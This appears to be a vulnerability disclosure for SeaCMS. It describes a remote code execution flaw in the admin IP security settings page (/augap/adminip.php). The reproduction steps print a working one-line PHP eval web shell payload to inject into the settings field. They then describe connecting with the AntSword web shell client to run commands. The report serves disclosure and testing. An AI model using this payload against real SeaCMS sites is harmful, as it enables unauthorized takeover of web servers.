1、Vulnerability Description
1.1Vulnerability Introduction
Through testing, it was found that there is a remote code execution vulnerability in/augap/adminip.php, which allows attackers to insert malicious code into the input box and execute it through the backend IP security settings
1.2 Problem Types
Remote code execution
1.3 Vulnerability threat level
high risk
1.4 Component Description
SeaCMS is a free, open-source website content management system written in PHP. This system is mainly designed to manage video on demand resources.
1.5 Scope of Impact
Full version of seacms
2、 Recurrence of vulnerabilities
Open the seacms backend system

Click on System ->Click on Background IP Security Settings

Within the box, RCE can be executed,
Payload=127.0.01 "; @ eval ($_POST ["hacker"]);?>

Click to confirm and find that the page has been updated

Connect using a Chinese AntSword

After the configuration is completed, the test has been conducted and the connection has been successful

Entering the virtual terminal is now ready to execute commands

417

被折叠的 条评论
为什么被折叠?



